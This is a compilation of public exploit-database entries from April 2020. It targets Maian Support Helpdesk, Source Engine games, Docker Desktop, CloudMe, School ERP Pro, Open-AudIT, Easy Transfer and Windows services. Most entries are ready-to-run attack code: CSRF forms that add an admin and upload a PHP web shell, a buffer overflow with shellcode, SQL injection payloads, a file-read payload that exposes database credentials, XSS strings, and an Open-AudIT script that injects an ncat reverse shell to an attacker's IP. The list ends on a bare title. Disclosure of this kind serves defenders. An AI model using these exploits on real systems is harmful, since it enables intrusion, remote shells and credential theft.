-
Maian Support Helpdesk 4.3 - Cross-Site Request Forgery (Add Admin)
# Exploit Title: Maian Support Helpdesk 4.3 - Cross-Site Request Forgery (Add Admin) # Date: 2020-04-26 # Author: Besim ALTINOK # Vendor Homepage: https://www.maiansupport.com # Software Link: https://www.maiansupport.com/zip.html # Version: v4.3 # Tested on: Xampp # Credit: İsmail BOZKURT ---------------------------------------------- Here is the Detail: -------------------------------------------------- This product is unprotected against CSRF vulnerabilities. With this attack, you can add an admin account to the system. In addition, you can add files from the F.A.Q field as admin.There are no file restrictions here. Therefore, you can upload a PHP file here with CSRF. If you want, you can add an admin account first and then access the system and upload files. Or you can upload files with direct admin rights. --------------------------------------------------- CSRF PoC - 1 (Add Administrator user) ------------------------------------- <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/helpdesk/admin/index.php?ajax=team" method="POST"> <input type="hidden" name="enabled" value="yes" /> <input type="hidden" name="admin" value="yes" /> <input type="hidden" name="welcome" value="yes" /> <input type="hidden" name="name" value="Besim ALTINOK" /> <input type="hidden" name="email" value="test2@gmail.com" /> <input type="hidden" name="accpass" value="111111" /> <input type="hidden" name="timezone" value="0" /> <input type="hidden" name="language" value="" /> <input type="hidden" name="addpages" value="" /> <input type="hidden" name="notePadEnable" value="yes" /> <input type="hidden" name="enableLog" value="yes" /> <input type="hidden" name="mergeperms" value="yes" /> <input type="hidden" name="profile" value="yes" /> <input type="hidden" name="ticketHistory" value="yes" /> <input type="hidden" name="close" value="yes" /> <input type="hidden" name="lock" value="yes" /> <input type="hidden" name="editperms[]" value="ticket" /> 
<input type="hidden" name="editperms[]" value="reply" /> <input type="hidden" name="timer" value="yes" /> <input type="hidden" name="startwork" value="yes" /> <input type="hidden" name="workedit" value="yes" /> <input type="hidden" name="notify" value="yes" /> <input type="hidden" name="spamnotify" value="yes" /> <input type="hidden" name="signature" value="" /> <input type="hidden" name="nameFrom" value="" /> <input type="hidden" name="emailFrom" value="" /> <input type="hidden" name="email2" value="" /> <input type="hidden" name="notes" value="" /> <input type="hidden" name="mailbox" value="yes" /> <input type="hidden" name="mailDeletion" value="yes" /> <input type="hidden" name="mailScreen" value="yes" /> <input type="hidden" name="mailCopy" value="yes" /> <input type="hidden" name="mailFolders" value="5" /> <input type="hidden" name="mailPurge" value="0" /> <input type="hidden" name="digest" value="yes" /> <input type="hidden" name="process" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html> - After the Add admin account, you can upload the PHP file. 
CSRF PoC 2 - ( Directly, File Upload) ---------------------------------------------------- <html> <body> <script>history.pushState('', '', '/')</script> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http:\/\/localhost\/helpdesk\/admin\/index.php?ajax=faqattach", true); xhr.setRequestHeader("Accept", "application\/json, text\/javascript, *\/*; q=0.01"); xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------1851832753272583700731626849"); xhr.withCredentials = true; var body = "-----------------------------1851832753272583700731626849\r\n" + "Content-Disposition: form-data; name=\"file[]\"; filename=\"shell.php\"\r\n" + "Content-Type: text/php\r\n" + "\r\n" + "\x3c?php echo system($_GET[\'cmd\']); ?\x3e\n" + "\r\n" + "-----------------------------1851832753272583700731626849\r\n" + "Content-Disposition: form-data; name=\"file[]\"\r\n" + "\r\n" + "\r\n" + "-----------------------------1851832753272583700731626849\r\n" + "Content-Disposition: form-data; name=\"remote[]\"\r\n" + "\r\n" + "\r\n" + "-----------------------------1851832753272583700731626849\r\n" + "Content-Disposition: form-data; name=\"remote[]\"\r\n" + "\r\n" + "\r\n" + "-----------------------------1851832753272583700731626849\r\n" + "Content-Disposition: form-data; name=\"remote[]\"\r\n" + "\r\n" + "\r\n" + "-----------------------------1851832753272583700731626849\r\n" + "Content-Disposition: form-data; name=\"process\"\r\n" + "\r\n" + "1\r\n" + "-----------------------------1851832753272583700731626849\r\n" + "Content-Disposition: form-data; name=\"opath\"\r\n" + "\r\n" + "\r\n" + "-----------------------------1851832753272583700731626849--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Submit request" 
onclick="submitRequest();" /> </form> </body> </html> HTTP Request: ----------------------------------------------------------------------------------------- GET /helpdesk/content/attachments-faq/shell.php?cmd=ls HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: PHPSESSID=4574c8e8190d39edd9d13a0fd9a502ec; bp_ut_session={"pageviews":1,"referrer":" http://localhost/olms/library/assets/js/images/","landingPage":" http://localhost/olms/library/assets/js/images/sort_asc.html ","started":1587817504988}; HESKb910af33bb5d80030b1f4b6f8666b57fac433d4d=71c43ff24f63f83f5a34d28997251db6 Upgrade-Insecure-Requests: 1 HTTP Response: ------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sun, 26 Apr 2020 12:15:31 GMT Server: Apache/2.4.43 (Unix) OpenSSL/1.1.1f PHP/7.2.29 mod_perl/2.0.8-dev Perl/v5.16.3 X-Powered-By: PHP/7.2.29 Content-Length: 39 Connection: close Content-Type: text/html; charset=UTF-8 shell.php shell_test.php shell_test.php
-
Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution
# Exploit Title: Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution # Date: 2020-04-27 # Exploit Author: 0xEmma/BugByte/SebastianPC # Vendor Homepage: https://www.valvesoftware.com/en/ # Version: Source Engine, Tested on CS:GO BuildID: 4937372 TF2 BuildID: 4871679 Garry's Mod BuildID: 4803834 Half Life 2 BuildID: 4233302 # Tested on: MacOS 15.3 # CVE : CVE-2020-12242 import os, random, sys banner = """ :'######:::'#######::'##::::'##::'######:::'#######::'##:::'##::::'##:::'########: '##... ##:'##.... ##: ##:::: ##:'##... ##:'##.... ##: ##::'##:::'####:::... ##..:: ##:::..:: ##'### ##: ##:::: ##: ##:::..::..::::: ##: ##:'##::::.. ##:::::: ##:::: . ######:: ## ### ##: ##:::: ##: ##::::::::'#######:: #####::::::: ##:::::: ##:::: :..... ##: ## #####:: ##:::: ##: ##::::::::...... ##: ##. ##:::::: ##:::::: ##:::: '##::: ##: ##.....::: ##:::: ##: ##::: ##:'##:::: ##: ##:. ##::::: ##:::::: ##:::: . ######::. #######::. #######::. ######::. #######:: ##::. ##::'######:::: ##:::: :......::::.......::::.......::::......::::.......:::..::::..:::......:::::..::::: """ print(banner) if os.name == "posix": command = str(input("Code to run? ")) payload = '"; ' + command + '; echo "' f = open("/tmp/hl2_relaunch", "w") f.write(payload) f.close() if os.name == "nt": print("Windows based OS's not supported, see CVE-2020-12242")
-
Docker-Credential-Wincred.exe - Privilege Escalation (Metasploit)
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ManualRanking include Msf::Exploit::EXE include Msf::Exploit::FileDropper include Post::Windows::Priv include Post::Windows::Runas def initialize(info = {}) super( update_info( info, 'Name' => 'Docker-Credential-Wincred.exe Privilege Escalation', 'Description' => %q{ This exploit leverages a vulnerability in docker desktop community editions prior to 2.1.0.1 where an attacker can write a payload to a lower-privileged area to be executed automatically by the docker user at login. }, 'License' => MSF_LICENSE, 'Author' => [ 'Morgan Roman', # discovery 'bwatters-r7', # metasploit module ], 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Targets' => [[ 'Automatic', {} ]], 'DefaultTarget' => 0, 'DefaultOptions' => { 'WfsDelay' => 15 }, 'DisclosureDate' => '2019-07-05', 'Notes' => { 'SideEffects' => [ ARTIFACTS_ON_DISK ] }, 'References' => [ ['CVE', '2019-15752'], ['URL', 'https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e'] ] ) ) register_options( [OptString.new('PROGRAMDATA', [true, 'Path to docker version-bin.', '%PROGRAMDATA%'])] ) end def docker_version output = cmd_exec('cmd.exe', '/c docker -v') vprint_status(output) version_string = output.match(/(\d+\.)(\d+\.)(\d)/)[0] Gem::Version.new(version_string.split('.').map(&:to_i).join('.')) end def check if docker_version <= Gem::Version.new('18.09.0') return CheckCode::Appears end CheckCode::Safe end def exploit check_permissions! case get_uac_level when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT fail_with(Failure::NotVulnerable, "UAC is set to 'Always Notify'. 
This module does not bypass this setting, exiting...") when UAC_DEFAULT print_good('UAC is set to Default') print_good('BypassUAC can bypass this setting, continuing...') when UAC_NO_PROMPT print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead') shell_execute_exe return end # make payload docker_path = expand_path("#{datastore['PROGRAMDATA']}\\DockerDesktop\\version-bin") fail_with(Failure::NotFound, 'Vulnerable Docker path is not on system') unless directory?(docker_path) payload_name = 'docker-credential-wincred.exe' payload_pathname = "#{docker_path}\\#{payload_name}" vprint_status('Making Payload') payload = generate_payload_exe # upload Payload vprint_status("Uploading Payload to #{payload_pathname}") write_file(payload_pathname, payload) vprint_status('Payload Upload Complete') print_status('Waiting for user to attempt to login') end def check_permissions! unless check == Exploit::CheckCode::Appears fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') end fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system? # Check if you are an admin # is_in_admin_group can be nil, true, or false end end
-
CloudMe 1.11.2 - Buffer Overflow (PoC)
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC) # Date: 2020-04-27 # Exploit Author: Andy Bowden # Vendor Homepage: https://www.cloudme.com/en # Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe # Version: CloudMe 1.11.2 # Tested on: Windows 10 x86 #Instructions: # Start the CloudMe service and run the script. import socket target = "127.0.0.1" padding1 = b"\x90" * 1052 EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET NOPS = b"\x90" * 30 #msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python payload = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33" payload += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc" payload += b"\x89\xfe\x54\x82\x72\xff\xa4\xe3\xfb\x1a\x95\x23\x9f" payload += b"\x6f\x85\x93\xeb\x22\x29\x5f\xb9\xd6\xba\x2d\x16\xd8" payload += b"\x0b\x9b\x40\xd7\x8c\xb0\xb1\x76\x0e\xcb\xe5\x58\x2f" payload += b"\x04\xf8\x99\x68\x79\xf1\xc8\x21\xf5\xa4\xfc\x46\x43" payload += b"\x75\x76\x14\x45\xfd\x6b\xec\x64\x2c\x3a\x67\x3f\xee" payload += b"\xbc\xa4\x4b\xa7\xa6\xa9\x76\x71\x5c\x19\x0c\x80\xb4" payload += b"\x50\xed\x2f\xf9\x5d\x1c\x31\x3d\x59\xff\x44\x37\x9a" payload += b"\x82\x5e\x8c\xe1\x58\xea\x17\x41\x2a\x4c\xfc\x70\xff" payload += b"\x0b\x77\x7e\xb4\x58\xdf\x62\x4b\x8c\x6b\x9e\xc0\x33" payload += b"\xbc\x17\x92\x17\x18\x7c\x40\x39\x39\xd8\x27\x46\x59" payload += b"\x83\x98\xe2\x11\x29\xcc\x9e\x7b\x27\x13\x2c\x06\x05" payload += b"\x13\x2e\x09\x39\x7c\x1f\x82\xd6\xfb\xa0\x41\x93\xf4" payload += b"\xea\xc8\xb5\x9c\xb2\x98\x84\xc0\x44\x77\xca\xfc\xc6" payload += b"\x72\xb2\xfa\xd7\xf6\xb7\x47\x50\xea\xc5\xd8\x35\x0c" payload += b"\x7a\xd8\x1f\x6f\x1d\x4a\xc3\x5e\xb8\xea\x66\x9f" overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload)) buf = padding1 + EIP + NOPS + payload + overrun try: s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target,8888)) s.send(buf) except Exception as e: print(sys.exc_value)
-
School ERP Pro 1.0 - 'es_messagesid' SQL Injection
# Exploit Title: School ERP Pro 1.0 - 'es_messagesid' SQL Injection # Date: 2020-04-28 # Author: Besim ALTINOK # Vendor Homepage: http://arox.in # Software Link: https://sourceforge.net/projects/school-erp-ultimate/ # Version: latest version # Tested on: Xampp # Credit: İsmail BOZKURT SQL Injection Detail -------------------------------- *# Vulnerable parameter: es_messagesid* *# Vulnerable code:* if($action=="fullmessage_sent"){ $msg_qry ="SELECT * FROM es_messages WHERE from_id=".$_SESSION['eschools']['user_id']." AND from_type='student' and es_messagesid=".*$es_messagesid;* $details_message=$db->getrow($msg_qry); } ?> *Here is the SQLmap output:* *----------------------------------------* GET parameter '*es_messagesid*' is vulnerable. sqlmap identified the following injection point(s): --- Parameter: es_messagesid (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: pid=27&action=fullmessage_sent&es_messagesid=17 OR NOT 6369=6369 Type: UNION query Title: Generic UNION query (random number) - 12 columns Payload: pid=27&action=fullmessage_sent&es_messagesid=17 UNION ALL SELECT 6194,6194,6194,6194,6194,6194,CONCAT(0x7162626b71,0x664750636f625866666c63425571426c5277516c49506c696f6548764c5a617977414d4849575a67,0x71707a7671),6194,6194,6194,6194,6194-- - --- [01:09:41] [INFO] testing MySQL [01:09:42] [INFO] confirming MySQL [01:09:44] [INFO] the back-end DBMS is MySQL
-
NVIDIA Update Service Daemon 1.0.21 - 'nvUpdatusService' Unquoted Service Path
# Exploit Title: NVIDIA Update Service Daemon 1.0.21 - 'nvUpdatusService' Unquoted Service Path # Discovery by: Roberto Piña # Discovery Date: 2020-04-27 # Vendor Homepage: https://www.nvidia.com/es-la/ # Software Link : https://www.nvidia.com/es-la/ # Tested Version: 1.0.21 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "NVIDIA" | findstr /i /v """ NVIDIA Update Service Daemon nvUpdatusService C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe Auto C:\>sc qc nvUpdatusService [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: nvUpdatusService TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START (DELAYED) CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : NVIDIA Update Service Daemon DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: .\UpdatusUser C:\> #Exploit: # A successful attempt would require the local user to be able to insert their code in the system root path # undetected by the OS or other security applications where it could potentially be executed during # application startup or reboot. If successful, the local user's code would execute with the elevated # privileges of the application.
-
Open-AudIT Professional 3.3.1 - Remote Code Execution
# Exploit Title: Open-AudIT Professional 3.3.1 - Remote Code Execution # Date: 2020-04-22 # Exploit Author: Askar # CVE: CVE-2020-8813 # Vendor Homepage: https://opmantek.com/ # Version: v3.3.1 # Tested on: Ubuntu 18.04 / PHP 7.2.24 #!/usr/bin/python3 import requests import sys import warnings import random import string from bs4 import BeautifulSoup from urllib.parse import quote warnings.filterwarnings("ignore", category=UserWarning, module='bs4') if len(sys.argv) != 6: print("[~] Usage : ./openaudit-exploit.py url username password ip port") exit() url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] ip = sys.argv[4] port = sys.argv[5] request = requests.session() def inject_payload(): configuration_path = url+"/en/omk/open-audit/configuration/90" data = 'data={"data":{"id":"90","type":"configuration","attributes":{"value":";ncat${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s${IFS};"}}}' % (ip, port) request.patch(configuration_path, data) print("[+] Payload injected in settings") def start_discovery(): discovery_path = url+"/en/omk/open-audit/discoveries/create" post_discovery_path = url+"/en/omk/open-audit/discoveries" scan_name = "".join([random.choice(string.ascii_uppercase) for i in range(10)]) req = request.get(discovery_path) response = req.text soup = BeautifulSoup(response, "html5lib") token = soup.findAll('input')[5].get("value") buttons = soup.findAll("button") headers = {"Referer" : discovery_path} request_data = { "data[attributes][name]":scan_name, "data[attributes][other][subnet]":"10.10.10.1/24", "data[attributes][other][ad_server]":"", "data[attributes][other][ad_domain]":"", "submit":"", "data[type]":"discoveries", "data[access_token]":token, "data[attributes][complete]":"y", "data[attributes][org_id]":"1", "data[attributes][type]":"subnet", "data[attributes][devices_assigned_to_org]":"", "data[attributes][devices_assigned_to_location]":"", "data[attributes][other][nmap][discovery_scan_option_id]":"1", 
"data[attributes][other][nmap][ping]":"y", "data[attributes][other][nmap][service_version]":"n", "data[attributes][other][nmap][open|filtered]":"n", "data[attributes][other][nmap][filtered]":"n", "data[attributes][other][nmap][timing]":"4", "data[attributes][other][nmap][nmap_tcp_ports]":"0", "data[attributes][other][nmap][nmap_udp_ports]":"0", "data[attributes][other][nmap][tcp_ports]":"22,135,62078", "data[attributes][other][nmap][udp_ports]":"161", "data[attributes][other][nmap][timeout]":"", "data[attributes][other][nmap][exclude_tcp_ports]":"", "data[attributes][other][nmap][exclude_udp_ports]":"", "data[attributes][other][nmap][exclude_ip]":"", "data[attributes][other][nmap][ssh_ports]":"22", "data[attributes][other][match][match_dbus]":"", "data[attributes][other][match][match_fqdn]":"", "data[attributes][other][match][match_dns_fqdn]":"", "data[attributes][other][match][match_dns_hostname]":"", "data[attributes][other][match][match_hostname]":"", "data[attributes][other][match][match_hostname_dbus]":"", "data[attributes][other][match][match_hostname_serial]":"", "data[attributes][other][match][match_hostname_uuid]":"", "data[attributes][other][match][match_ip]":"", "data[attributes][other][match][match_ip_no_data]":"", "data[attributes][other][match][match_mac]":"", "data[attributes][other][match][match_mac_vmware]":"", "data[attributes][other][match][match_serial]":"", "data[attributes][other][match][match_serial_type]":"", "data[attributes][other][match][match_sysname]":"", "data[attributes][other][match][match_sysname_serial]":"", "data[attributes][other][match][match_uuid]":"" } print("[+] Creating discovery ..") req = request.post(post_discovery_path, data=request_data, headers=headers, allow_redirects=False) disocvery_url = url + req.headers['Location'] + "/execute" print("[+] Triggering payload ..") print("[+] Check your nc ;)") request.get(disocvery_url) def login(): login_info = { "redirect_url": "/en/omk/open-audit", "username": username, 
"password": password } login_request = request.post(url+"/en/omk/open-audit/login", login_info) login_text = login_request.text if "There was an error authenticating" in login_text: return False else: return True if login(): print("[+] LoggedIn Successfully") inject_payload() start_discovery() else: print("[-] Cannot login!")
-
School ERP Pro 1.0 - Remote Code Execution
# Exploit Title: School ERP Pro 1.0 - Remote Code Execution # Date: 2020-04-28 # Author: Besim ALTINOK # Vendor Homepage: http://arox.in # Software Link: https://sourceforge.net/projects/school-erp-ultimate/ # Version: latest version # Tested on: Xampp # Credit: İsmail BOZKURT Description ------------------------------------------- A student can send a message to the admin. Additionally, with this method, the student can upload a PHP file to the system and run code in the system. ------------------------------------ *Vulnerable code - 1: (for student area) - sendmail.inc.php* - Student user can send message to admin with the attachment ------------------------------------ $image_file = basename($_FILES['newimage']['name'][$i]); $ext=explode(".",$_FILES['newimage']['name'][$i]); $str=date("mdY_hms"); //$t=rand(1, 15); $new_thumbname = "$ext[0]".$str.$t.".".$ext[1]; $updir = "images/messagedoc/"; $dest_path = $updir.$new_thumbname; $up_images[$i] = $dest_path; $srcfile = $_FILES['newimage']['tmp_name'][$i]; @move_uploaded_file($srcfile, $dest_path); $ins_arr_prod_images = array( '`es_messagesid`' => $id, '`message_doc`' => $new_thumbname ); $idss=$db->insert("es_message_documents",$ins_arr_prod_images); --------------------------------------------------- *PoC of the Remote Code Execution* --------------------------------------------------- POST /erp/student_staff/index.php?pid=27&action=mailtoadmin HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 *************************** Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/erp/student_staff/index.php?pid=27&action=mailtoadmin Content-Type: multipart/form-data; boundary=---------------------------2104557667975595321153031663 Content-Length: 718 DNT: 1 Connection: close Cookie: PHPSESSID=8a7cca1efcb3ff66502ed010172d497a; expandable=5c Upgrade-Insecure-Requests: 1 
-----------------------------2104557667975595321153031663 Content-Disposition: form-data; name="subject" DEDED -----------------------------2104557667975595321153031663 Content-Disposition: form-data; name="message" <p>DEDED</p> -----------------------------2104557667975595321153031663 Content-Disposition: form-data; name="newimage[]"; filename="shell.php" Content-Type: text/php <?php phpinfo(); ?> -----------------------------2104557667975595321153031663 Content-Disposition: form-data; name="filecount[]" 1 -----------------------------2104557667975595321153031663 Content-Disposition: form-data; name="submit_staff" Send -----------------------------2104557667975595321153031663-- ------------------------------------ *Vulnerable code - 2: (for admin area) - pre-editstudent.inc.php* - Admin user can update user profile photo ------------------------------------ if (is_uploaded_file($_FILES['pre_image']['tmp_name'])) { $ext = explode(".",$_FILES['pre_image']['name']); $str = date("mdY_hms"); $new_thumbname = "st_".$str."_".$ext[0].".".$ext[1]; $updir = "images/student_photos/"; $uppath = $updir.$new_thumbname; move_uploaded_file($_FILES['pre_image']['tmp_name'],$uppath); $file = $new_thumbname; ------------------------------------ Bypass Technique: ------------------------------------ $_FILES['pre_image']['name']; --- > shell.php.png $ext = explode(".",$_FILES['pre_image']['name']); --- $new_thumbname = "st_".$str."_".$ext[0].".".$ext[1]; $ext[0] --> shell $ext[1] --> php lastfilename --> st_date_shell.php
-
School ERP Pro 1.0 - Arbitrary File Read
# Exploit Title: School ERP Pro 1.0 - Arbitrary File Read # Date: 2020-04-28 # Author: Besim ALTINOK # Vendor Homepage: http://arox.in # Software Link: https://sourceforge.net/projects/school-erp-ultimate/ # Version: latest version # Tested on: Xampp # Credit: İsmail BOZKURT # CVE: N/A Vulnerable code: (/student_staff/download.php) - File Name: download.php - Content of the download.php <?php if ( isset($_REQUEST["document"])&&$_REQUEST["document"]!="") { $file = $_REQUEST['document']; header("Content-type: application/force-download"); header("Content-Transfer-Encoding: Binary"); header("Content-length: ".filesize($file)); header("Content-disposition: attachment; filename=\"".$file."\""); readfile($file); exit; } ?> ------------ *Payload:* --------------- http://localhost/school_erp/student_staff/download.php?document=../includes/constants.inc.php ------------------------ *After run payload: (we accessed of the file content)* ------------------------ <?php define('DB_SERVER', 'localhost'); define('DB_SERVER_USERNAME', 'aroxi********'); define('DB_SERVER_PASSWORD', 'erp**********'); define('DB_DATABASE', 'aroxi****************'); ?>
-
Easy Transfer 1.7 for iOS - Directory Traversal
# Title: Easy Transfer 1.7 for iOS - Directory Traversal # Author: Vulnerability Laboratory # Date: 2020-04-27 # Software: https://apps.apple.com/us/app/easy-transfer-wifi-transfer/id1484667078 # CVE: N/A Document Title: =============== Easy Transfer v1.7 iOS - Multiple Web Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2223 Common Vulnerability Scoring System: ==================================== 7.1 Affected Product(s): ==================== Rubikon Teknoloji Product: Easy Transfer v1.7 - iOS Mobile Web-Application (Copy of the Homepage: https://apps.apple.com/us/app/easy-transfer-wifi-transfer/id1484667078 ) Vulnerability Disclosure Timeline: ================================== 2020-04-27: Public Disclosure (Vulnerability Laboratory) Technical Details & Description: ================================ 1.1 A directory traversal web vulnerability has been discovered in the Easy Transfer Wifi Transfer v1.7 iOS mobile application. The vulnerability allows remote attackers to change the application path in performed requests to compromise the local application or file-system of a mobile device. Attackers are, for example, able to request environment variables or a sensitive system path. The directory-traversal web vulnerability is located in the main application path request performed via the GET method. Attackers are able to request, for example, the local path variables of the web-server by changing the local path in the performed request itself. In a first request the attacker changes the path, and the host redirects to complete the address with "..". Then the attacker just appends /.. and a final slash to the request, and the path can be accessed via web-browser to download or list local files. Exploitation of the directory traversal web vulnerability requires no privileged web-application user account or user interaction. 
Successful exploitation of the vulnerability results in information leakage through unauthorized file access and mobile application compromise. 1.2 Multiple persistent cross-site scripting vulnerabilities have been discovered in the Easy Transfer Wifi Transfer v1.7 iOS mobile application. The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector to compromise the mobile web-application from the application-side. The persistent vulnerabilities are located in the `Create Folder` and `Move/Edit` functions. Attackers are able to inject their own malicious script code into the `oldPath`, `newPath` and `path` parameters. The request method to inject is POST and the attack vector is located on the application-side. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] Create Folder [+] Move/Edit Vulnerable Parameter(s): [+] oldPath [+] newPath [+] path Proof of Concept (PoC): ======================= 1.1 The directory traversal web vulnerability can be exploited by remote attackers with wifi network access without user interaction. For security demonstration or to reproduce the vulnerability, follow the provided information and steps below to continue. 
PoC: Exploitation http://localhost/list?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../ [{"path":"/../../../../../../../../../../../../../../../../../../../../../../../../../../../test/","name":"test"}] --- PoC Session Logs [GET] --- (list) http://localhost/list?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../ Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive - GET: HTTP/1.1 200 OK Content-Length: 213 Content-Type: application/json Connection: Close 1.2 The persistent input validation web vulnerabilities can be exploited by remote attackers with wifi network access with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. 
PoC: Exploitation <scriptx00>alert(document.domain)</script> --- PoC Session Logs [POST] --- (Create & Move) http://localhost/create Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 47 Origin: http://localhost Connection: keep-alive Referer: http://localhost/ path=/test<scriptx00>alert(document.domain)</script> - POST: HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 2 Content-Type: application/json Connection: Close - http://localhost/move Host: localhost Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 69 Origin: http://localhost Connection: keep-alive Referer: http://localhost/ oldPath=/test/<scriptx00>alert(document.domain)</script>&newPath=/test<scriptx00>alert(document.domain)</script> - POST: HTTP/1.1 200 OK Content-Length: 411 Content-Type: text/html; charset=utf-8 Connection: Close - [GET] (Execution) http://localhost/evil.source Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive Referer: http://localhost/ Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. -- VULNERABILITY LABORATORY - RESEARCH TEAM
-
Andrea ST Filters Service 1.0.64.7 - 'Andrea ST Filters Service ' Unquoted Service Path
# Exploit Title: Andrea ST Filters Service 1.0.64.7 - 'Andrea ST Filters Service ' Unquoted Service Path # Discovery by: Roberto Piña # Discovery Date: 2020-04-28 # Vendor Homepage: https://andreaelectronics.com/ # Software Link : https://andreaelectronics.com/ # Tested Version: 1.0.64.7 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Andrea" | findstr /i /v """ Andrea ST Filters Service AESTFilters C:\Program Files\IDT\WDM\AESTSr64.exe Auto C:\>sc qc AESTFilters [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: AESTFilters TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\IDT\WDM\AESTSr64.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Andrea ST Filters Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem #Exploit: # A successful attempt would require the local user to be able to insert their code in the system root path # undetected by the OS or other security applications where it could potentially be executed during # application startup or reboot. If successful, the local user's code would execute with the elevated # privileges of the application.
-
Internet Download Manager 6.37.11.1 - Stack Buffer Overflow (PoC)
